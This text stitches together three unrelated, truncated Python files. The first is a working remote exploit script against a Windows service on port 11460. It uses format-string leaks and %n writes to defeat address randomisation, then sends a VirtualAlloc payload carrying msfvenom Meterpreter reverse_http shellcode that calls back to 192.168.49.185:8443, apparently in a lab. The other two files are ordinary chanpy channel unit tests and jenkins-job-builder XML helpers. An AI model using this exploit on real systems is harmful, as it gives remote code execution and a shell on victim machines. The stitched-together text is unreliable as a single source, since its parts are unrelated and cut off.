def dump_stack_values_to_log(s: socket):
# psAgentCommand
buf = pack(">i", 0x400)
buf += bytearray([0x41] * 0xC)
buf += pack("<i", 0x604) # opcode
buf += pack("<i", 0x0) # 1st memcpy: offset
buf += pack("<i", 0x100) # 1st memcpy: size field
buf += pack("<i", 0x100) # 2nd memcpy: offset
buf += pack("<i", 0x100) # 2nd memcpy: size field
buf += pack("<i", 0x200) # 3rd memcpy: offset
buf += pack("<i", 0x100) # 3rd memcpy: size field
buf += bytearray([0x41] * 0x8)
# psCommandBuffer
buf += b"w00t:BBAAAA" + b"%x:" * 0x80
buf += b"B" * 0x100
buf += b"C" * 0x100
# Padding
buf += bytearray([0x41] * (0x404 - len(buf)))
s.send(buf)
receive_data(s)
def dump_stack_pointer_to_log(s: socket, address: int):
# psAgentCommand
buf = pack(">i", 0x400)
buf += bytearray([0x41] * 0xC)
buf += pack("<i", 0x604) # opcode
buf += pack("<i", 0x0) # 1st memcpy: offset
buf += pack("<i", 0x100) # 1st memcpy: size field
buf += pack("<i", 0x100) # 2nd memcpy: offset
buf += pack("<i", 0x100) # 2nd memcpy: size field
buf += pack("<i", 0x200) # 3rd memcpy: offset
buf += pack("<i", 0x100) # 3rd memcpy: size field
buf += bytearray([0x41] * 0x8)
# psCommandBuffer
address_bytes = pack("<i", address)
buf += b"w00t_BB" + address_bytes + b"%x" * 20
buf += b":%s"
buf += b"%x" * 0x6b
buf += b"B" * 0x100
buf += b"C" * 0x100
# Padding
buf += bytearray([0x41] * (0x404 - len(buf)))
s.send(buf)
receive_data(s)
# Memory indices:
# 1 <- Stack address
# 11 <- windows_storage address.
# 13 <- user32 address.
# 17 <- cfgmgr32 address.
def get_latest_leaked_addresses_from_log(s: socket, startValue: int, return_value_count=21):
global start_value
w00t_finds = []
while True:
# psAgentCommand
buf = pack(">i", 0x400)
buf += bytearray([0x41] * 0xC)
buf += pack("<i", 0x520) # opcode
buf += pack("<i", 0x0) # 1st memcpy: offset
buf += pack("<i", 0x100) # 1st memcpy: size field
buf += pack("<i", 0x100) # 2nd memcpy: offset
buf += pack("<i", 0x100) # 2nd memcpy: size field
buf += pack("<i", 0x200) # 3rd memcpy: offset
buf += pack("<i", 0x100) # 3rd memcpy: size field
buf += bytearray([0x41] * 0x8)
# psCommandBuffer
buf += b"FileType: %d ,Start: %d, Length: %d" % (1, startValue, 0x1000)
buf += b"B" * 0x100
buf += b"C" * 0x100
# Padding
buf += bytearray([0x41] * (0x404 - len(buf)))
s.send(buf)
response = s.recv(4)
response_size = int(response.hex(), 16)
print("Downloading... Start Value: " + str(hex(startValue)) + " Size: " + str(hex(response_size)))
response = b""
bytes_downloaded = 0
try:
while True:
response += s.recv(4096)
if len(response) >= response_size:
break
except Exception as e:
print(e)
print(response_size)
print(len(response))
woot_split = response.split(b'w00t')
if len(woot_split) > 1:
for i in range(1, len(woot_split)):
w00t_finds.append(woot_split[i][0:0x80 * 18])
if response_size >= 0x100000:
startValue += 0x1000
continue
break
memory_values = []
leaked_address_bytes = w00t_finds[-1].split(b':')
returned_values = 0
for leaked_address in leaked_address_bytes:
try:
memory_values.append(int(leaked_address, 16))
returned_values += 1
if returned_values >= return_value_count:
break
except:
pass
start_value = startValue
return memory_values
def get_latest_leaked_kernelbase_from_log(s: socket, startValue: int):
global start_value
w00t_finds = []
while True:
# psAgentCommand
buf = pack(">i", 0x400)
buf += bytearray([0x41] * 0xC)
buf += pack("<i", 0x520) # opcode
buf += pack("<i", 0x0) # 1st memcpy: offset
buf += pack("<i", 0x100) # 1st memcpy: size field
buf += pack("<i", 0x100) # 2nd memcpy: offset
buf += pack("<i", 0x100) # 2nd memcpy: size field
buf += pack("<i", 0x200) # 3rd memcpy: offset
buf += pack("<i", 0x100) # 3rd memcpy: size field
buf += bytearray([0x41] * 0x8)
# psCommandBuffer
buf += b"FileType: %d ,Start: %d, Length: %d" % (1, startValue, 0x1000)
buf += b"B" * 0x100
buf += b"C" * 0x100
# Padding
buf += bytearray([0x41] * (0x404 - len(buf)))
s.send(buf)
response = s.recv(4)
response_size = int(response.hex(), 16)
print("Downloading... Start Value: " + str(hex(startValue)) + " Size: " + str(hex(response_size)))
response = b""
bytes_downloaded = 0
try:
while True:
response += s.recv(4096)
if len(response) >= response_size:
break
except Exception as e:
print(e)
print(response_size)
print(len(response))
woot_split = response.split(b'w00t')
if len(woot_split) > 1:
for i in range(1, len(woot_split)):
w00t_finds.append(woot_split[i][0:0x80 * 18])
if response_size >= 0x100000:
startValue += 0x1000
continue
break
leaked_address_bytes = w00t_finds[-1].split(b':')
kbString = leaked_address_bytes[1]
kb_address = 0x00
kb_address += kbString[3] << 24
kb_address += kbString[2] << 16
kb_address += kbString[1] << 8
kb_address += kbString[0]
return kb_address
def print_memory_values(memory_values: list):
for i in range(0, len(memory_values)):
print("{}: {}".format(i, str(hex(memory_values[i]))))
def write_byte_value(s: socket, byte_value: int, write_address: int):
if byte_value > 0xC6:
width = byte_value - 0xC7 + 0x8
else:
width = byte_value + 0x39 + 0x8
# psAgentCommand
buf = pack(">i", 0x400)
buf += bytearray([0x41] * 0xC)
buf += pack("<i", 0x604) # opcode
buf += pack("<i", 0x0) # 1st memcpy: offset
buf += pack("<i", 0x100) # 1st memcpy: size field
buf += pack("<i", 0x100) # 2nd memcpy: offset
buf += pack("<i", 0x100) # 2nd memcpy: size field
buf += pack("<i", 0x200) # 3rd memcpy: offset
buf += pack("<i", 0x100) # 3rd memcpy: size field
buf += bytearray([0x41] * 0x8)
# psCommandBuffer
buf += b"w00t:BB" + pack("<i", write_address)
buf += b"%x" * 5 + b":"
buf += b"%6x:"
buf += b"%x:" * 13
buf += b"%" + b"%d" % width + b"x:"
buf += b"%n"
buf += b"%x" * 0x6b
buf += b"B" * 0x100
buf += b"C" * 0x100
# Padding
buf += bytearray([0x41] * (0x404 - len(buf)))
s.send(buf)
def write_dword_value(s: socket, dword_value: int, write_address: int):
for index in range(4):
byte_value = dword_value >> (8 * index) & 0xff
write_byte_value(s, byte_value, write_address + index)
def send_invalid_opcode(s: socket):
# Found buffer at 0xd283b30 with leaked stack address of 0xd22ded4
# buffer is at leaked stack address + 0x55c5c
# psAgentCommand
buf = pack(">i", 0x400)
buf += bytearray([0x41] * 0xC)
buf += pack("<i", 0x80) # opcode
buf += pack("<i", 0x0) # 1st memcpy: offset
buf += pack("<i", 0x100) # 1st memcpy: size field
buf += pack("<i", 0x100) # 2nd memcpy: offset
buf += pack("<i", 0x100) # 2nd memcpy: size field
buf += pack("<i", 0x200) # 3rd memcpy: offset
buf += pack("<i", 0x100) # 3rd memcpy: size field
buf += bytearray([0x41] * 0x8)
# psCommandBuffer
buf += b"DDDDEEEEFFFFGGGGHHHH"
buf += pack("<i", 0x200)
buf += b"C" * 0x200
# Padding
buf += bytearray([0x41] * (0x404 - len(buf)))
s.send(buf)
# receive_data(s)
def send_payload(s: socket, shellcode: bytearray, buffer_address: int, kb_base: int):
shellcode_offset = 0x18
# psAgentCommand
buf = pack(">i", 0x400)
buf += bytearray([0x41] * 0xC)
buf += pack("<i", 0x80) # opcode
buf += pack("<i", 0x0) # 1st memcpy: offset
buf += pack("<i", 0x300) # 1st memcpy: size field
buf += pack("<i", 0x100) # 2nd memcpy: offset
buf += pack("<i", 0x100) # 2nd memcpy: size field
buf += pack("<i", 0x200) # 3rd memcpy: offset
buf += pack("<i", 0x100) # 3rd memcpy: size field
buf += bytearray([0x41] * 0x8)
# psCommandBuffer
# Stack Setup:
# VirtualAlloc address
# Return address AKA Shellcode address
# Shellcode address
# 0x200
# 0x1000
# 0x40
buf += pack("<i", convert_kernel_base_address(kb_base, 0x101125D0))
buf += pack("<i", buffer_address + shellcode_offset)
buf += pack("<i", buffer_address + shellcode_offset)
buf += pack("<i", 0x200)
buf += pack("<i", 0x1000)
buf += pack("<i", 0x40)
buf += b'\x90' * 0x20
buf += shellcode
# Padding
buf += bytearray([0x41] * (0x404 - len(buf)))
s.send(buf)
# receive_data(s)
def convert_kernel_base_address(kb_base_address: int, address: int):
return address - 0x10000000 + kb_base_address
def get_shellcode(lhost: str, lport: int):
cmd = ['/usr/bin/msfvenom', '-p', 'windows/meterpreter/reverse_http', 'LHOST={}'.format(lhost), 'LPORT={}'.format(str(lport)), 'EXITFUNC=thread', '-f', 'raw']
shellcode_result = subprocess.run(cmd, shell=False, check=False, capture_output=True)
print("Payload: {}".format(cmd[2]))
print("Local Host: {}".format(lhost))
print("Local Port: {}".format(str(lport)))
print(shellcode_result.stderr.decode('UTF-8'))
return shellcode_result.stdout
def main():
global start_value
server = "192.168.185.10"
lhost = "192.168.49.185"
lport = 8443
if len(sys.argv) >= 2:
server = sys.argv[1]
port = 11460
print("Generating shellcode...")
shellcode = get_shellcode(lhost, lport)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
s.connect((server, port))
print("Dumping values in the stack to the log...")
dump_stack_values_to_log(s)
print("Retreiving | |
#!/usr/bin/env python3
# Copyright 2019 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import threading
import time
import unittest
import chanpy as c
from chanpy import _buffers, chan, transducers as xf
from chanpy._channel import Promise, create_flag, FlagHandler
def b_list(ch):
return list(ch.to_iter())
async def a_list(ch):
return await c.to_list(ch).get()
class TestAsync(unittest.TestCase):
def test_thread_put_to_async_get_without_wait(self):
def putter(ch):
ch.b_put('success')
async def main():
ch = chan()
threading.Thread(target=putter, args=[ch]).start()
return await ch.get()
self.assertEqual(asyncio.run(main()), 'success')
def test_thread_get_to_async_put_after_wait(self):
result = None
def getter(ch):
nonlocal result
result = ch.b_get()
async def main():
ch = chan()
getter_thread = threading.Thread(target=getter, args=[ch])
getter_thread.start()
self.assertIs(await ch.put('success'), True)
getter_thread.join()
self.assertEqual(result, 'success')
asyncio.run(main())
def test_async_only_transfer(self):
async def getter(ch):
return await ch.get()
async def main():
ch = chan()
get_ch = c.go(getter(ch))
self.assertIs(await ch.put('success'), True)
self.assertEqual(await get_ch.get(), 'success')
asyncio.run(main())
def test_go_from_different_thread(self):
def getter_thread(ch):
async def getter():
return await ch.get()
return c.go(getter()).b_get()
async def main():
ch = chan()
thread_result_ch = c.thread(lambda: getter_thread(ch))
self.assertIs(await ch.put('success'), True)
self.assertEqual(await thread_result_ch.get(), 'success')
asyncio.run(main())
def test_go_coroutine_never_awaited(self):
""" Test that no 'coroutine was not awaited' warning is raised
The warning could be raised if the coroutine was added to the loop
indirectly.
Example:
# If 'go' used a wrapper coroutine around 'coro' then 'coro' may
# never be added to the loop. This is because there is no guarantee
# that the wrapper coroutine will ever run and thus call await on
# 'coro'.
#
# The following 'go' implementation would fail if wrapper never
# ends up running:
def go(coro):
ch = chan(1)
async def wrapper():
ret = await coro # I may never run
if ret is not None:
await ch.put(ret)
ch.close()
asyncio.run_coroutine_threadsafe(wrapper(), get_loop())
"""
def thread():
async def coro():
pass
c.go(coro())
async def main():
c.thread(thread).b_get()
# Assert does NOT warn
with self.assertRaises(AssertionError):
with self.assertWarns(RuntimeWarning):
asyncio.run(main())
def test_alt_get_no_wait(self):
get_ch, put_ch = chan(), chan()
async def putter():
await get_ch.put('success')
async def main():
c.go(putter())
await asyncio.sleep(0.1)
return await c.alt([put_ch, 'noSend'], get_ch, priority=True)
self.assertEqual(asyncio.run(main()), ('success', get_ch))
def test_alt_put_after_wait(self):
get_ch, put_ch = chan(), chan()
async def putter():
await asyncio.sleep(0.1)
await put_ch.get()
async def main():
c.go(putter())
return await c.alt([put_ch, 'success'], get_ch, priority=True)
self.assertEqual(asyncio.run(main()), (True, put_ch))
def test_alt_timeout(self):
async def main():
start_time = time.time()
timeout_ch = c.timeout(100)
self.assertEqual(await c.alt(chan(), timeout_ch),
(None, timeout_ch))
elapsed_secs = time.time() - start_time
self.assertIs(0.05 < elapsed_secs < 0.15, True)
asyncio.run(main())
def test_alt_default_when_available(self):
async def main():
ch = chan(1)
await ch.put('success')
self.assertEqual(await c.alt(ch, default='ignore me'),
('success', ch))
asyncio.run(main())
def test_alt_default_when_unavailable(self):
async def main():
ch = chan()
self.assertEqual(await c.alt(ch, default='success'),
('success', 'default'))
asyncio.run(main())
def test_successful_cancel_get(self):
async def main():
ch = chan()
get_future = ch.get()
self.assertIs(get_future.cancelled(), False)
self.assertIs(get_future.cancel(), True)
self.assertIs(get_future.cancelled(), True)
self.assertIs(ch.offer('reject me'), False)
asyncio.run(main())
def test_successful_cancel_put(self):
async def main():
ch = chan()
put_future = ch.put('cancel me')
self.assertIs(put_future.cancelled(), False)
self.assertIs(put_future.cancel(), True)
self.assertIs(put_future.cancelled(), True)
self.assertIsNone(ch.poll())
asyncio.run(main())
def test_successful_cancel_alt(self):
async def main():
ch = chan()
alt_future = c.alt(ch, priority=True)
self.assertIs(alt_future.cancelled(), False)
self.assertIs(alt_future.cancel(), True)
self.assertIs(alt_future.cancelled(), True)
self.assertIs(ch.offer('reject me'), False)
asyncio.run(main())
def test_unsuccessful_cancel_get(self):
async def main():
ch = chan()
get_future = ch.get()
self.assertIs(await ch.put('success'), True)
# cancel() will end up calling set_result() since
# set_result_threadsafe() callback won't have been called yet
self.assertIs(get_future.cancel(), False)
self.assertEqual(get_future.result(), 'success')
asyncio.run(main())
def test_unsuccessful_cancel_put(self):
async def main():
ch = chan()
put_future = ch.put('val')
self.assertEqual(await ch.get(), 'val')
# cancel() will end up calling set_result() since
# set_result_threadsafe() callback won't have been called yet
self.assertIs(put_future.cancel(), False)
self.assertIs(put_future.result(), True)
asyncio.run(main())
def test_unsuccessful_cancel_alt(self):
async def main():
success_ch, fail_ch = chan(), chan()
alt_future = c.alt(fail_ch, success_ch)
self.assertIs(await success_ch.put('success'), True)
# cancel() will end up calling set_result() since
# set_result_threadsafe() callback won't have been called yet
self.assertIs(alt_future.cancel(), False)
self.assertEqual(alt_future.result(), ('success', success_ch))
asyncio.run(main())
class AbstractTestBufferedBlocking:
def test_unsuccessful_blocking_put_none(self):
with self.assertRaises(TypeError):
self.chan(1).b_put(None)
def test_successful_blocking_get(self):
ch = self.chan(1)
threading.Thread(target=ch.b_put, args=['success']).start()
self.assertEqual(ch.b_get(), 'success')
def test_successful_blocking_put(self):
self.assertIs(self.chan(1).b_put('success'), True)
def test_blocking_get_closed_empty_buffer(self):
ch = self.chan(1)
ch.close()
self.assertIsNone(ch.b_get())
def test_blocking_get_closed_full_buffer(self):
ch = self.chan(1)
ch.b_put('success')
ch.close()
self.assertEqual(ch.b_get(), 'success')
def test_blocking_put_closed_empty_buffer(self):
ch = self.chan(1)
ch.close()
self.assertIs(ch.b_put('failure'), False)
def test_blocking_put_closed_full_buffer(self):
ch = self.chan(1)
ch.b_put('fill buffer')
ch.close()
self.assertIs(ch.b_put('failure'), False)
def test_close_while_blocking_get(self):
ch = self.chan(1)
def thread():
time.sleep(0.1)
ch.close()
threading.Thread(target=thread).start()
self.assertIsNone(ch.b_get())
def test_close_while_blocking_put(self):
ch = self.chan(1)
ch.b_put('fill buffer')
def thread():
time.sleep(0.1)
ch.close()
ch.b_get()
threading.Thread(target=thread).start()
self.assertIs(ch.b_put('success'), True)
self.assertEqual(ch.b_get(), 'success')
self.assertIsNone(ch.b_get())
def test_iter(self):
ch = self.chan(2)
ch.b_put('one')
ch.b_put('two')
ch.close()
self.assertEqual(b_list(ch), ['one', 'two'])
class TestBufferedBlockingChan(unittest.TestCase,
AbstractTestBufferedBlocking):
@staticmethod
def chan(n):
return c.chan(c.buffer(n))
class AbstractTestXform:
def test_xform_map(self):
async def main():
ch = self.chan(1, xf.map(lambda x: x + 1))
c.onto_chan(ch, [0, 1, 2])
self.assertEqual(await a_list(ch), [1, 2, 3])
asyncio.run(main())
def test_xform_filter(self):
async def main():
ch = self.chan(1, xf.filter(lambda x: x % 2 == 0))
c.onto_chan(ch, [0, 1, 2])
self.assertEqual(await a_list(ch), [0, 2])
asyncio.run(main())
def test_xform_early_termination(self):
async def main():
ch = self.chan(1, xf.take(2))
c.onto_chan(ch, [1, 2, 3, 4])
self.assertEqual(await a_list(ch), [1, 2])
asyncio.run(main())
def test_xform_early_termination_works_after_close(self):
async def main():
ch = self.chan(1, xf.take_while(lambda x: x != 2))
for i in range(4):
ch.f_put(i)
ch.close()
self.assertEqual(await a_list(ch), [0, 1])
self.assertEqual(len(ch._puts), 0)
asyncio.run(main())
def test_xform_successful_overfilled_buffer(self):
ch = self.chan(1, xf.cat)
ch.b_put([1, 2, 3])
ch.close()
self.assertEqual(b_list(ch), [1, 2, 3])
def test_xform_unsuccessful_offer_overfilled_buffer(self):
ch = self.chan(1, xf.cat)
ch.b_put([1, 2])
self.assertIs(ch.offer([1]), False)
def test_unsuccessful_transformation_to_none(self):
ch = self.chan(1, xf.map(lambda _: None))
with self.assertRaises(AssertionError):
ch.b_put('failure')
def test_close_flushes_xform_buffer(self):
ch = self.chan(3, xf.partition_all(2))
for i in range(3):
ch.b_put(i)
ch.close()
self.assertEqual(b_list(ch), [(0, 1), (2,)])
def test_close_does_not_flush_xform_with_pending_puts(self):
ch = self.chan(1, xf.partition_all(2))
for i in range(3):
ch.f_put(i)
ch.close()
self.assertEqual(b_list(ch), [(0, 1), (2,)])
def test_xform_ex_handler_non_none_return(self):
def handler(e):
if isinstance(e, ZeroDivisionError):
return 'zero'
ch = self.chan(3, xf.map(lambda x: 12 // x), handler)
ch.b_put(-1)
ch.b_put(0)
ch.b_put(2)
ch.close()
self.assertEqual(b_list(ch), [-12, 'zero', 6])
def test_xform_ex_handler_none_return(self):
ch = self.chan(3, xf.map(lambda x: 12 // x), lambda _: None)
ch.b_put(-1)
ch.b_put(0)
ch.b_put(2)
ch.close()
self.assertEqual(b_list(ch), [-12, 6])
class TestXformBufferedChan(unittest.TestCase, AbstractTestXform):
@staticmethod
def chan(n, xform, ex_handler=None):
return c.chan(c.buffer(n), xform, ex_handler)
class AbstractTestBufferedNonblocking:
def test_unsuccessful_offer_none(self):
with self.assertRaises(TypeError):
self.chan(1).offer(None)
def test_successful_poll(self):
ch = self.chan(1)
threading.Thread(target=ch.b_put, args=['success']).start()
time.sleep(0.1)
self.assertEqual(ch.poll(), 'success')
def test_successful_offer(self):
ch = self.chan(1)
def thread():
time.sleep(0.1)
ch.offer('success')
threading.Thread(target=thread).start()
self.assertEqual(ch.b_get(), 'success')
def test_unsuccessful_poll(self):
self.assertIsNone(self.chan(1).poll())
def test_unsuccessful(self):
ch = self.chan(1)
ch.b_put('fill buffer')
self.assertIs(ch.offer('failure'), False)
def test_poll_closed_empty_buffer(self):
ch = self.chan(1)
ch.close()
self.assertIsNone(ch.poll())
def test_poll_closed_full_buffer(self):
ch = self.chan(1)
ch.b_put('success')
ch.close()
self.assertEqual(ch.poll(), 'success')
def test_offer_closed_empty_buffer(self):
ch = self.chan(1)
ch.close()
self.assertIs(ch.offer('failure'), False)
def test_closed_full_buffer(self):
ch = self.chan(1)
ch.b_put('fill buffer')
ch.close()
self.assertIs(ch.offer('failure'), False)
class TestBufferedNonBlockingChan(unittest.TestCase,
AbstractTestBufferedNonblocking):
@staticmethod
def chan(n):
return chan(c.buffer(n))
class TestChan(unittest.TestCase):
def test_ValueError_nonpositive_buffer(self):
with self.assertRaises(ValueError):
chan(0)
class AbstractTestUnbufferedBlocking:
def test_unsuccessful_blocking_put_none(self):
with self.assertRaises(TypeError):
self.chan().b_put(None)
def test_blocking_get_first(self):
ch = self.chan()
def thread():
time.sleep(0.1)
ch.b_put('success')
threading.Thread(target=thread).start()
self.assertEqual(ch.b_get(), 'success')
def test_blocking_put_first(self):
ch = self.chan()
def thread():
time.sleep(0.1)
ch.b_get()
threading.Thread(target=thread).start()
self.assertIs(ch.b_put('success'), True)
def test_put_blocks_until_get(self):
status = 'failure'
ch = self.chan()
def thread():
nonlocal status
time.sleep(0.1)
status = 'success'
ch.b_get()
threading.Thread(target=thread).start()
ch.b_put(1)
self.assertEqual(status, 'success')
def test_blocking_get_after_close(self):
ch = self.chan()
ch.close()
self.assertIsNone(ch.b_get())
def test_blocking_put_after_close(self):
ch = self.chan()
ch.close()
self.assertIs(ch.b_put('failure'), False)
def test_close_while_blocking_get(self):
ch = self.chan()
def thread():
time.sleep(0.1)
ch.close()
threading.Thread(target=thread).start()
self.assertIsNone(ch.b_get())
def test_close_while_blocking_put(self):
ch = self.chan()
def thread():
time.sleep(0.1)
ch.close()
ch.b_get()
threading.Thread(target=thread).start()
self.assertIs(ch.b_put('success'), True)
self.assertIsNone(ch.b_get())
def test_iter(self):
ch = self.chan()
ch.f_put('one')
ch.f_put('two')
ch.close()
self.assertEqual(b_list(ch), ['one', 'two'])
def test_xform_exception(self):
with self.assertRaises(TypeError):
self.chan(None, xf.cat)
def test_ex_handler_exception(self):
with self.assertRaises(TypeError):
self.chan(ex_handler=xf.identity)
class TestUnbufferedBlockingChan(unittest.TestCase,
AbstractTestUnbufferedBlocking):
@staticmethod
def chan():
return chan()
class AbstractTestUnbufferedNonblocking:
def test_unsuccessful_offer_none(self):
with self.assertRaises(TypeError):
self.chan().offer(None)
def test_successful_poll(self):
ch = self.chan()
threading.Thread(target=ch.b_put, args=['success']).start()
time.sleep(0.1)
self.assertEqual(ch.poll(), 'success')
def test_successful_offer(self):
ch = self.chan()
def thread():
time.sleep(0.1)
ch.offer('success')
threading.Thread(target=thread).start()
self.assertEqual(ch.b_get(), 'success')
def test_unsuccessful_poll(self):
self.assertIsNone(self.chan().poll())
def test_unsuccessful_offer(self):
self.assertIs(self.chan().offer('failure'), False)
def test_poll_after_close(self):
ch = self.chan()
ch.close()
self.assertIsNone(ch.poll())
def test_offer_after_close(self):
ch = self.chan()
ch.close()
self.assertIs(ch.offer('failure'), False)
class TestUnbufferedNonblockingChan(unittest.TestCase,
AbstractTestUnbufferedNonblocking):
@staticmethod
def chan():
return chan()
class TestPromiseChan(unittest.TestCase):
def test_multiple_gets(self):
ch = c.promise_chan()
self.assertIs(ch.b_put('success'), True)
self.assertEqual(ch.b_get(), 'success')
self.assertEqual(ch.b_get(), 'success')
def test_multiple_puts(self):
ch = c.promise_chan()
self.assertIs(ch.b_put('success'), True)
self.assertIs(ch.b_put('drop me'), True)
def test_after_close(self):
ch = c.promise_chan()
ch.b_put('success')
ch.close()
self.assertIs(ch.b_put('failure'), False)
self.assertIs(ch.b_put('failure'), False)
self.assertEqual(ch.b_get(), 'success')
self.assertEqual(ch.b_get(), 'success')
def test_xform_filter(self):
ch = c.promise_chan(xf.filter(lambda x: x > 0))
self.assertIs(ch.b_put(-1), True)
self.assertIs(ch.b_put(1), True)
self.assertIs(ch.b_put(2), True)
self.assertEqual(ch.b_get(), 1)
self.assertEqual(ch.b_get(), 1)
def test_xform_complete_flush(self):
ch = c.promise_chan(xf.partition_all(3))
self.assertIs(ch.b_put(1), True)
self.assertIs(ch.b_put(2), True)
self.assertIsNone(ch.poll())
ch.close()
self.assertEqual(ch.b_get(), (1, | |
<filename>jenkins_jobs/modules/helpers.py
# Copyright 2015 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import xml.etree.ElementTree as XML
from jenkins_jobs.errors import InvalidAttributeError
from jenkins_jobs.errors import JenkinsJobsException
from jenkins_jobs.errors import MissingAttributeError
def build_trends_publisher(plugin_name, xml_element, data):
"""Helper to create various trend publishers.
"""
def append_thresholds(element, data, only_totals):
"""Appends the status thresholds.
"""
for status in ['unstable', 'failed']:
status_data = data.get(status, {})
limits = [
('total-all', 'TotalAll'),
('total-high', 'TotalHigh'),
('total-normal', 'TotalNormal'),
('total-low', 'TotalLow')]
if only_totals is False:
limits.extend([
('new-all', 'NewAll'),
('new-high', 'NewHigh'),
('new-normal', 'NewNormal'),
('new-low', 'NewLow')])
for key, tag_suffix in limits:
tag_name = status + tag_suffix
XML.SubElement(element, tag_name).text = str(
status_data.get(key, ''))
# Tuples containing: setting name, tag name, default value
settings = [
('healthy', 'healthy', ''),
('unhealthy', 'unHealthy', ''),
('health-threshold', 'thresholdLimit', 'low'),
('plugin-name', 'pluginName', plugin_name),
('default-encoding', 'defaultEncoding', ''),
('can-run-on-failed', 'canRunOnFailed', False),
('use-stable-build-as-reference', 'useStableBuildAsReference', False),
('use-previous-build-as-reference',
'usePreviousBuildAsReference', False),
('use-delta-values', 'useDeltaValues', False),
('thresholds', 'thresholds', {}),
('should-detect-modules', 'shouldDetectModules', False),
('dont-compute-new', 'dontComputeNew', True),
('do-not-resolve-relative-paths', 'doNotResolveRelativePaths', False),
('pattern', 'pattern', '')]
thresholds = ['low', 'normal', 'high']
for key, tag_name, default in settings:
xml_config = XML.SubElement(xml_element, tag_name)
config_value = data.get(key, default)
if key == 'thresholds':
append_thresholds(
xml_config,
config_value,
data.get('dont-compute-new', True))
elif key == 'health-threshold' and config_value not in thresholds:
raise JenkinsJobsException("health-threshold must be one of %s" %
", ".join(thresholds))
else:
if isinstance(default, bool):
xml_config.text = str(config_value).lower()
else:
xml_config.text = str(config_value)
def config_file_provider_builder(xml_parent, data):
"""Builder / Wrapper helper"""
xml_files = XML.SubElement(xml_parent, 'managedFiles')
files = data.get('files', [])
for file in files:
xml_file = XML.SubElement(xml_files, 'org.jenkinsci.plugins.'
'configfiles.buildwrapper.ManagedFile')
mapping = [
('file-id', 'fileId', None),
('target', 'targetLocation', ''),
('variable', 'variable', ''),
('replace-tokens', 'replaceTokens', False),
]
convert_mapping_to_xml(xml_file, file, mapping, fail_required=True)
def config_file_provider_settings(xml_parent, data):
SETTINGS_TYPES = ['file', 'cfp']
settings = {
'default-settings':
'jenkins.mvn.DefaultSettingsProvider',
'settings':
'jenkins.mvn.FilePathSettingsProvider',
'config-file-provider-settings':
'org.jenkinsci.plugins.configfiles.maven.job.MvnSettingsProvider',
'default-global-settings':
'jenkins.mvn.DefaultGlobalSettingsProvider',
'global-settings':
'jenkins.mvn.FilePathGlobalSettingsProvider',
'config-file-provider-global-settings':
'org.jenkinsci.plugins.configfiles.maven.job.'
'MvnGlobalSettingsProvider',
}
if 'settings' in data:
# Support for Config File Provider
settings_file = str(data['settings'])
settings_type = data.get('settings-type', 'file')
# For cfp versions <2.10.0 we are able to detect cfp via the config
# settings name.
text = 'org.jenkinsci.plugins.configfiles.maven.MavenSettingsConfig'
if settings_file.startswith(text):
settings_type = 'cfp'
if settings_type == 'file':
lsettings = XML.SubElement(
xml_parent, 'settings',
{'class': settings['settings']})
XML.SubElement(lsettings, 'path').text = settings_file
elif settings_type == 'cfp':
lsettings = XML.SubElement(
xml_parent, 'settings',
{'class': settings['config-file-provider-settings']})
XML.SubElement(lsettings, 'settingsConfigId').text = settings_file
else:
raise InvalidAttributeError(
'settings-type', settings_type, SETTINGS_TYPES)
else:
XML.SubElement(xml_parent, 'settings',
{'class': settings['default-settings']})
if 'global-settings' in data:
# Support for Config File Provider
global_settings_file = str(data['global-settings'])
global_settings_type = data.get('global-settings-type', 'file')
# For cfp versions <2.10.0 we are able to detect cfp via the config
# settings name.
text = ('org.jenkinsci.plugins.configfiles.maven.'
'GlobalMavenSettingsConfig')
if global_settings_file.startswith(text):
global_settings_type = 'cfp'
if global_settings_type == 'file':
gsettings = XML.SubElement(xml_parent, 'globalSettings',
{'class': settings['global-settings']})
XML.SubElement(gsettings, 'path').text = global_settings_file
elif global_settings_type == 'cfp':
gsettings = XML.SubElement(
xml_parent, 'globalSettings',
{'class': settings['config-file-provider-global-settings']})
XML.SubElement(
gsettings,
'settingsConfigId').text = global_settings_file
else:
raise InvalidAttributeError(
'settings-type', global_settings_type, SETTINGS_TYPES)
else:
XML.SubElement(xml_parent, 'globalSettings',
{'class': settings['default-global-settings']})
def copyartifact_build_selector(xml_parent, data, select_tag='selector'):
select = data.get('which-build', 'last-successful')
selectdict = {
'last-successful': 'StatusBuildSelector',
'last-completed': 'LastCompletedBuildSelector',
'specific-build': 'SpecificBuildSelector',
'last-saved': 'SavedBuildSelector',
'upstream-build': 'TriggeredBuildSelector',
'permalink': 'PermalinkBuildSelector',
'workspace-latest': 'WorkspaceSelector',
'build-param': 'ParameterizedBuildSelector',
'downstream-build': 'DownstreamBuildSelector',
'multijob-build': 'MultiJobBuildSelector'
}
if select not in selectdict:
raise InvalidAttributeError('which-build',
select,
selectdict.keys())
permalink = data.get('permalink', 'last')
permalinkdict = {'last': 'lastBuild',
'last-stable': 'lastStableBuild',
'last-successful': 'lastSuccessfulBuild',
'last-failed': 'lastFailedBuild',
'last-unstable': 'lastUnstableBuild',
'last-unsuccessful': 'lastUnsuccessfulBuild'}
if permalink not in permalinkdict:
raise InvalidAttributeError('permalink',
permalink,
permalinkdict.keys())
if select == 'multijob-build':
selector = XML.SubElement(xml_parent, select_tag,
{'class':
'com.tikal.jenkins.plugins.multijob.' +
selectdict[select]})
else:
selector = XML.SubElement(xml_parent, select_tag,
{'class':
'hudson.plugins.copyartifact.' +
selectdict[select]})
mapping = []
if select == 'specific-build':
mapping.append(('build-number', 'buildNumber', ''))
if select == 'last-successful':
mapping.append(('stable', 'stable', False))
if select == 'upstream-build':
mapping.append(
('fallback-to-last-successful', 'fallbackToLastSuccessful', False))
